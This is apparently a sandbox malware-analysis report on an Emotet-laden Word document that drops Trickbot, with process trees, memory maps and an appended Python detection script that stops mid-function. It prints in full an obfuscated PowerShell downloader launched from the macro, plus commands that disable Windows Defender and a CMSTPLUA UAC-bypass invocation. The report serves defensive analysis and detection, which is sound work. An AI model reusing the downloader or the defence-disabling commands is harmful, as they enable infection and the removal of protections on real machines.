Emotet Drops Trickbot (25-Jun-18) | Sequential Behavior
VTI SCORE: 100/100
Target: win7_64_sp1-mso2007 | ms_office
Classification: Exploit, Dropper, Downloader

3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1 (SHA256)

022543.doc

Word Document

Created at 2018-06-25 14:51:00

Notifications (1/1)

The operating system was rebooted during the analysis.

Monitored Processes

Process Overview
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0x940 Analysis Target Medium winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" -
#2 0xa08 Child Process Medium powershell.exe PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') #1
#3 0xb40 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #2
#4 0xb50 Child Process Medium 280.exe "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe" #3
#5 0xb64 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #4
#6 0xb70 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" #5
#8 0x4f4 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp" #6
#9 0x64 Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #6
#10 0x8a0 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#11 0x728 Child Process Medium syncpack.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp" #6
#12 0x834 Child Process Medium syncpack_.exe "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp" #6
#13 0x7b4 Child Process Medium surtq5qk9h.exe "C:\ProgramData\suRtQ5QK9h.exe" #6
#14 0x62c Child Process Medium oyvgkgw.exe "C:\ProgramData\oyvGkGw.exe" #9
#15 0x13c Child Process Medium cmd.exe /c sc stop WinDefend #14
#16 0x77c Child Process Medium cmd.exe /c sc delete WinDefend #14
#17 0x648 Child Process Medium cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true #14
#18 0x914 Child Process Medium powershell.exe powershell Set-MpPreference -DisableRealtimeMonitoring $true #17
#19 0x9a4 Child Process Medium sc.exe sc delete WinDefend #16
#20 0x9d8 Child Process Medium sc.exe sc stop WinDefend #15
#21 0x200 RPC Server High (Elevated) dllhost.exe C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} #14
#22 0x3d4 Child Process High (Elevated) oyvhkhw.exe "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe" #21

Behavior Information - Sequential View

Process #1: winword.exe
Information Value
ID #1
File Name c:\program files (x86)\microsoft office\office12\winword.exe
Command Line "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:00:52, Reason: Analysis Target
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:04:16
OS Process Information
Information Value
PID 0x940
Parent PID 0x520 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x9A0
0x99C
0x998
0x994
0x990
0x968
0x944
0x9F4
0x9F8
0x9FC
0xA04
0xA2C
0xB84
0xB90
0x85C
Region
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False -
pagefile_0x0000000000020000 0x00020000 0x00022fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000030000 0x00030000 0x00032fff Pagefile Backed Memory Readable False False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable False False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable False False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable False False False -
private_0x0000000000130000 0x00130000 0x00130fff Private Memory Readable, Writable False False False -
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable False False False -
private_0x0000000000150000 0x00150000 0x0017afff Private Memory Readable, Writable False False False -
private_0x0000000000180000 0x00180000 0x0018ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000190000 0x00190000 0x00192fff Pagefile Backed Memory Readable False False False -
private_0x00000000001a0000 0x001a0000 0x001a3fff Private Memory Readable, Writable False False False -
private_0x00000000001b0000 0x001b0000 0x001c7fff Private Memory Readable, Writable False False False -
private_0x00000000001d0000 0x001d0000 0x001dffff Private Memory Readable, Writable False False False -
private_0x00000000001e0000 0x001e0000 0x001effff Private Memory Readable, Writable False False False -
private_0x00000000001f0000 0x001f0000 0x001f0fff Private Memory Readable, Writable False False False -
private_0x0000000000200000 0x00200000 0x0020ffff Private Memory - False False False -
private_0x0000000000210000 0x00210000 0x0021ffff Private Memory Readable, Writable False False False -
private_0x0000000000220000 0x00220000 0x0022ffff Private Memory Readable, Writable False False False -
private_0x0000000000230000 0x00230000 0x0023ffff Private Memory Readable, Writable False False False -
private_0x0000000000240000 0x00240000 0x0024ffff Private Memory Readable, Writable False False False -
private_0x0000000000250000 0x00250000 0x0034ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000350000 0x00350000 0x004d7fff Pagefile Backed Memory Readable False False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory - False False False -
private_0x00000000004f0000 0x004f0000 0x004fffff Private Memory Readable, Writable False False False -
private_0x0000000000500000 0x00500000 0x0050ffff Private Memory Readable, Writable False False False -
private_0x0000000000510000 0x00510000 0x0051ffff Private Memory Readable, Writable False False False -
private_0x0000000000520000 0x00520000 0x0052ffff Private Memory Readable, Writable False False False -
private_0x0000000000530000 0x00530000 0x005affff Private Memory Readable, Writable False False False -
pagefile_0x00000000005b0000 0x005b0000 0x00730fff Pagefile Backed Memory Readable False False False -
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable False False False -
private_0x0000000000750000 0x00750000 0x0075ffff Private Memory Readable, Writable False False False -
private_0x0000000000760000 0x00760000 0x0076ffff Private Memory Readable, Writable False False False -
private_0x0000000000770000 0x00770000 0x0077ffff Private Memory Readable, Writable False False False -
private_0x0000000000780000 0x00780000 0x0078ffff Private Memory Readable, Writable False False False -
private_0x0000000000790000 0x00790000 0x0088ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000000890000 0x00890000 0x01c8ffff Pagefile Backed Memory Readable False False False -
office.odf 0x01c90000 0x01ec9fff Memory Mapped File Readable False False False -
pagefile_0x0000000001ed0000 0x01ed0000 0x01faefff Pagefile Backed Memory Readable False False False -
private_0x0000000001fb0000 0x01fb0000 0x01feffff Private Memory Readable, Writable False False False -
private_0x0000000001ff0000 0x01ff0000 0x01ffffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002000000 0x02000000 0x02001fff Pagefile Backed Memory Readable False False False -
sortdefault.nls 0x02010000 0x022defff Memory Mapped File Readable False False False -
private_0x00000000022e0000 0x022e0000 0x022fffff Private Memory Readable, Writable False False False -
private_0x0000000002300000 0x02300000 0x0230ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002310000 0x02310000 0x02310fff Pagefile Backed Memory Readable False False False -
private_0x0000000002320000 0x02320000 0x0232ffff Private Memory Readable, Writable False False False -
private_0x0000000002330000 0x02330000 0x0233ffff Private Memory Readable, Writable False False False -
private_0x0000000002340000 0x02340000 0x0234ffff Private Memory Readable, Writable False False False -
private_0x0000000002350000 0x02350000 0x0235ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002360000 0x02360000 0x02360fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002380000 0x02380000 0x02386fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002390000 0x02390000 0x02391fff Pagefile Backed Memory Readable, Writable False False False -
private_0x00000000023a0000 0x023a0000 0x023a0fff Private Memory Readable, Writable, Executable False False False -
private_0x00000000023b0000 0x023b0000 0x023b0fff Private Memory Readable, Writable False False False -
pagefile_0x00000000023c0000 0x023c0000 0x023c0fff Pagefile Backed Memory Readable False False False -
private_0x00000000023d0000 0x023d0000 0x023dffff Private Memory Readable, Writable False False False -
private_0x00000000023e0000 0x023e0000 0x023effff Private Memory Readable, Writable False False False -
private_0x00000000023f0000 0x023f0000 0x0242ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002430000 0x02430000 0x02430fff Pagefile Backed Memory Readable False False False -
private_0x0000000002440000 0x02440000 0x0247ffff Private Memory Readable, Writable False False False -
staticcache.dat 0x02480000 0x02daffff Memory Mapped File Readable False False False -
pagefile_0x0000000002db0000 0x02db0000 0x02db0fff Pagefile Backed Memory Readable False False False -
pagefile_0x0000000002dc0000 0x02dc0000 0x02dc0fff Pagefile Backed Memory Readable False False False -
private_0x0000000002dd0000 0x02dd0000 0x02ddffff Private Memory Readable, Writable False False False -
private_0x0000000002de0000 0x02de0000 0x02deffff Private Memory Readable, Writable False False False -
private_0x0000000002df0000 0x02df0000 0x02dfffff Private Memory Readable, Writable False False False -
private_0x0000000002e00000 0x02e00000 0x02e0ffff Private Memory Readable, Writable False False False -
private_0x0000000002e10000 0x02e10000 0x02e1ffff Private Memory Readable, Writable False False False -
private_0x0000000002e20000 0x02e20000 0x02e2ffff Private Memory Readable, Writable False False False -
private_0x0000000002e30000 0x02e30000 0x02e3ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000002e40000 0x02e40000 0x02e41fff Pagefile Backed Memory Readable False False False -
private_0x0000000002e50000 0x02e50000 0x02e5ffff Private Memory Readable, Writable False False False -
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db 0x02e60000 0x02e7efff Memory Mapped File Readable False False False -
pagefile_0x0000000002e80000 0x02e80000 0x02e80fff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000002e90000 0x02e90000 0x02e9ffff Private Memory Readable, Writable False False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable, Executable False False False -
msxml5r.dll 0x02ee0000 0x02ef6fff Memory Mapped File Readable False False False -
private_0x0000000002f00000 0x02f00000 0x02f0ffff Private Memory Readable, Writable False False False -
private_0x0000000002f10000 0x02f10000 0x02f1ffff Private Memory Readable, Writable False False False -
private_0x0000000002f20000 0x02f20000 0x02f2ffff Private Memory Readable, Writable False False False -
private_0x0000000002f30000 0x02f30000 0x02faffff Private Memory Readable, Writable False False False -
private_0x0000000002fb0000 0x02fb0000 0x02fbffff Private Memory Readable, Writable False False False -
private_0x0000000002fc0000 0x02fc0000 0x02ffffff Private Memory Readable, Writable False False False -
private_0x0000000003000000 0x03000000 0x0303ffff Private Memory Readable, Writable False False False -
private_0x0000000003040000 0x03040000 0x0304ffff Private Memory Readable, Writable False False False -
private_0x0000000003050000 0x03050000 0x0305ffff Private Memory Readable, Writable False False False -
private_0x0000000003060000 0x03060000 0x0306ffff Private Memory Readable, Writable False False False -
private_0x0000000003070000 0x03070000 0x0307ffff Private Memory Readable, Writable False False False -
private_0x0000000003080000 0x03080000 0x0308ffff Private Memory Readable, Writable False False False -
private_0x0000000003090000 0x03090000 0x030cffff Private Memory Readable, Writable, Executable False False False -
pagefile_0x00000000030d0000 0x030d0000 0x034c2fff Pagefile Backed Memory Readable False False False -
private_0x00000000034d0000 0x034d0000 0x034dffff Private Memory Readable, Writable False False False -
private_0x00000000034e0000 0x034e0000 0x0351ffff Private Memory Readable, Writable False False False -
private_0x0000000003520000 0x03520000 0x0352ffff Private Memory Readable, Writable False False False -
private_0x0000000003530000 0x03530000 0x0353ffff Private Memory Readable, Writable False False False -
private_0x0000000003540000 0x03540000 0x0357ffff Private Memory Readable, Writable False False False -
private_0x0000000003580000 0x03580000 0x0358ffff Private Memory Readable, Writable False False False -
private_0x0000000003590000 0x03590000 0x0359ffff Private Memory Readable, Writable False False False -
private_0x00000000035a0000 0x035a0000 0x035affff Private Memory Readable, Writable False False False -
private_0x00000000035b0000 0x035b0000 0x035effff Private Memory Readable, Writable False False False -
private_0x00000000035f0000 0x035f0000 0x0362ffff Private Memory Readable, Writable False False False -
private_0x0000000003630000 0x03630000 0x0363ffff Private Memory Readable, Writable False False False -
private_0x0000000003640000 0x03640000 0x0364efff Private Memory Readable, Writable False False False -
private_0x0000000003650000 0x03650000 0x0374ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003750000 0x03750000 0x03b4ffff Pagefile Backed Memory Readable, Writable False False False -
private_0x0000000003b50000 0x03b50000 0x03b51fff Private Memory Readable, Writable False False False -
msctf.dll.mui 0x03b60000 0x03b60fff Memory Mapped File Readable, Writable False False False -
private_0x0000000003b70000 0x03b70000 0x03b7ffff Private Memory Readable, Writable False False False -
pagefile_0x0000000003b80000 0x03b80000 0x03b80fff Pagefile Backed Memory Readable False False False -
private_0x0000000003b90000 0x03b90000 0x03c8ffff Private Memory Readable, Writable False False False -
private_0x0000000003c90000 0x03c90000 0x03d8ffff Private Memory Readable, Writable False False False -
kernelbase.dll.mui 0x03d90000 0x03e4ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000003e50000 0x03e50000 0x03e71fff Private Memory Readable, Writable False False False -
private_0x0000000003e80000 0x03e80000 0x03e8ffff Private Memory Readable, Writable False False False -
private_0x0000000003e90000 0x03e90000 0x0428ffff Private Memory Readable, Writable False False False -
private_0x0000000004290000 0x04290000 0x042a5fff Private Memory Readable, Writable False False False -
private_0x00000000042b0000 0x042b0000 0x042bffff Private Memory Readable, Writable False False False -
private_0x00000000042c0000 0x042c0000 0x042c5fff Private Memory Readable, Writable False False False -
private_0x00000000042d0000 0x042d0000 0x042d0fff Private Memory Readable, Writable False False False -
private_0x00000000042e0000 0x042e0000 0x0431ffff Private Memory Readable, Writable False False False -
private_0x0000000004320000 0x04320000 0x04320fff Private Memory Readable, Writable False False False -
private_0x0000000004330000 0x04330000 0x04338fff Private Memory Readable, Writable False False False -
private_0x0000000004340000 0x04340000 0x0434ffff Private Memory Readable, Writable False False False -
private_0x0000000004350000 0x04350000 0x04358fff Private Memory Readable, Writable False False False -
private_0x0000000004360000 0x04360000 0x04373fff Private Memory Readable, Writable False False False -
private_0x0000000004390000 0x04390000 0x04392fff Private Memory Readable, Writable False False False -
private_0x00000000043a0000 0x043a0000 0x043b2fff Private Memory Readable, Writable False False False -
private_0x0000000004410000 0x04410000 0x0444ffff Private Memory Readable, Writable False False False -
private_0x00000000044c0000 0x044c0000 0x045bffff Private Memory Readable, Writable False False False -
private_0x0000000004620000 0x04620000 0x0471ffff Private Memory Readable, Writable False False False -
private_0x0000000004720000 0x04720000 0x04adefff Private Memory Readable, Writable False False False -
private_0x0000000004bd0000 0x04bd0000 0x04c0ffff Private Memory Readable, Writable False False False -
private_0x0000000004c90000 0x04c90000 0x04d8ffff Private Memory Readable, Writable False False False -
private_0x0000000004d90000 0x04d90000 0x04e8ffff Private Memory Readable, Writable False False False -
winword.exe 0x2fc50000 0x2fca6fff Memory Mapped File Readable, Writable, Executable False False False -
msvcp80.dll 0x70290000 0x70316fff Memory Mapped File Readable, Writable, Executable False False False -
msproof6.dll 0x70320000 0x703d5fff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x703e0000 0x7041afff Memory Mapped File Readable, Writable, Executable False False False -
shdocvw.dll 0x70420000 0x7044dfff Memory Mapped File Readable, Writable, Executable False False False -
msointl.dll 0x70450000 0x70e2cfff Memory Mapped File Readable, Writable, Executable False False False -
msores.dll 0x70e30000 0x71483fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
oart.dll 0x724b0000 0x7322ffff Memory Mapped File Readable, Writable, Executable False False False -
wwlib.dll 0x73230000 0x742dbfff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74310000 0x74325fff Memory Mapped File Readable, Writable, Executable False False False -
For performance reasons, the remaining 217 entries are omitted.
The remaining entries can be found in flog.txt.
Threads
Thread 0x944
Category Operation Information Success Count Logfile
System Get Time type = Local Time, time = 2018-06-26 00:52:11 (Local Time) True 1 Fn
System Get Time type = Local Time, time = 2018-06-26 00:52:13 (Local Time) True 1 Fn
System Get Info type = Operating System True 1 Fn
Module Get Handle module_name = KERNEL32.DLL, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = FlsAlloc, address_out = 0x75fc4f2b True 1 Fn
Module Get Address module_name = Unknown module name, function = FlsGetValue, address_out = 0x75fc1252 True 1 Fn
Module Get Address module_name = Unknown module name, function = FlsSetValue, address_out = 0x75fc4208 True 1 Fn
Module Get Address module_name = Unknown module name, function = FlsFree, address_out = 0x75fc359f True 1 Fn
Module Get Handle module_name = kernel32.dll, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = InitializeCriticalSectionAndSpinCount, address_out = 0x75fc1916 True 1 Fn
Module Get Handle module_name = KERNEL32.DLL, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = EncodePointer, address_out = 0x77c20fcb True 1 Fn
Module Get Address module_name = Unknown module name, function = DecodePointer, address_out = 0x77c19d35 True 1 Fn
Environment Get Environment String - True 1 Fn, Data
File Open filename = STD_INPUT_HANDLE True 1 Fn
File Open filename = STD_OUTPUT_HANDLE True 1 Fn
File Open filename = STD_ERROR_HANDLE True 1 Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE, size = 260 True 1 Fn
Module Get Handle module_name = KERNEL32, base_address = 0x75fb0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = IsProcessorFeaturePresent, address_out = 0x75fc5235 True 1 Fn
System Get Info type = Operating System True 1 Fn
Module Get Handle module_name = c:\program files (x86)\microsoft office\office12\winword.exe, base_address = 0x2fc50000 True 1 Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1 Fn
Module Load module_name = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\1033\VBE6INTL.DLL, base_address = 0x65300000 True 1 Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1 Fn
Registry Read Value reg_name = 8804558B-B773-11d1-BC3E-0000F87552E7, data = } False 1 Fn
System Get Info type = Operating System True 1 Fn
Module Get Handle module_name = USER32, base_address = 0x771c0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = GetSystemMetrics, address_out = 0x771d7d2f True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromWindow, address_out = 0x771e3150 True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromRect, address_out = 0x771fe7a0 True 1 Fn
Module Get Address module_name = Unknown module name, function = MonitorFromPoint, address_out = 0x771e5281 True 1 Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayMonitors, address_out = 0x771e451a True 1 Fn
Module Get Address module_name = Unknown module name, function = GetMonitorInfoA, address_out = 0x771e4413 True 1 Fn
Module Get Address module_name = Unknown module name, function = EnumDisplayDevicesA, address_out = 0x771e4572 True 1 Fn
Module Get Handle module_name = ole32.dll, base_address = 0x75be0000 True 1 Fn
Module Get Address module_name = Unknown module name, function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1 Fn
Module Get Address module_name = Unknown module name, function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1 Fn
Module Get Filename process_name = c:\program files (x86)\microsoft office\office12\winword.exe, file_name_orig = C:\PROGRA~2\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL, size = 260 True 1 Fn
File Create Directory C:\Users\kFT6uTQW\AppData\Local\Temp\VBE True 1 Fn
Process Create process_name = PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') , os_pid = 0xa08, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1 Fn
System Sleep duration = 0 milliseconds (0.000 seconds) True 1 Fn
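Read together, the process tree above and this thread log give a detection engineer three things to key on: WINWORD.EXE spawning PowerShell with `show_window = SW_HIDE` and an obfuscated (`-bXor`, `[CHAR]`, `$env:ComSpec[...]`) command line; the dropped payload neutering Defender with `sc stop WinDefend`, `sc delete WinDefend` and `Set-MpPreference -DisableRealtimeMonitoring $true`; and a Medium-integrity process obtaining a High-integrity child through `DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}`, the CMSTPLUA COM object (ICMLuaUtil) that is a well-known UAC-bypass vector. The following Python is an added example, not part of the VMRay report: it encodes those three observations as rules over process-creation records constructed from the Process Overview table (field names and the rule names are ours; `origin_pid` follows the report's Origin ID column, which for the COM server is the RPC client rather than the real parent).

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One row of the report's Process Overview (field names are ours)."""
    pid: int
    origin_pid: int    # the row's "Origin ID" process: parent, or RPC client for a COM server
    integrity: str
    image: str
    cmdline: str


# Constructed from the Process Overview table above; the very long PowerShell
# array literal is abbreviated to its first three values.
SAMPLE = [
    ProcEvent(0x940, 0x520, "Medium", "winword.exe",
              r'"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"'),
    ProcEvent(0xa08, 0x940, "Medium", "powershell.exe",
              "PowersHell -join ((98,49,44) |%{ [CHAR]($_ -bXor\"0x46\" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')"),
    ProcEvent(0xb40, 0xa08, "Medium", "280.exe", r'"C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"'),
    ProcEvent(0x62c, 0x64, "Medium", "oyvgkgw.exe", r'"C:\ProgramData\oyvGkGw.exe"'),
    ProcEvent(0x13c, 0x62c, "Medium", "cmd.exe", "/c sc stop WinDefend"),
    ProcEvent(0x77c, 0x62c, "Medium", "cmd.exe", "/c sc delete WinDefend"),
    ProcEvent(0x648, 0x62c, "Medium", "cmd.exe",
              "/c powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(0x914, 0x648, "Medium", "powershell.exe",
              "powershell Set-MpPreference -DisableRealtimeMonitoring $true"),
    ProcEvent(0x9a4, 0x77c, "Medium", "sc.exe", "sc delete WinDefend"),
    ProcEvent(0x200, 0x62c, "High (Elevated)", "dllhost.exe",
              r"C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"),
    ProcEvent(0x3d4, 0x200, "High (Elevated)", "oyvhkhw.exe",
              r'"C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"'),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# CMSTPLUA / ICMLuaUtil: an auto-elevating COM class commonly abused to bypass UAC.
CMSTPLUA_CLSID = "{3e5fc7f9-9a51-4367-9063-a120244fbec7}"

OBFUSCATED_PS = re.compile(r"-bxor|\[char\]|\$env:comspec\[", re.I)
DEFENDER_SVC = re.compile(r"\bsc(?:\.exe)?\s+(?:stop|delete)\s+WinDefend\b", re.I)
DEFENDER_RTP = re.compile(r"Set-MpPreference\b.*-DisableRealtimeMonitoring\s+\$true", re.I)


def detect(events):
    """Return (rule, pid) findings, one per rule hit, in input order."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        origin = by_pid.get(e.origin_pid)
        # 1. Office application launching a script host (macro -> PowerShell).
        if origin and origin.image in OFFICE_APPS and e.image in SCRIPT_HOSTS:
            findings.append(("office_spawns_script_host", e.pid))
        # 2. PowerShell command line carrying XOR/char-array obfuscation markers.
        if e.image == "powershell.exe" and OBFUSCATED_PS.search(e.cmdline):
            findings.append(("obfuscated_powershell", e.pid))
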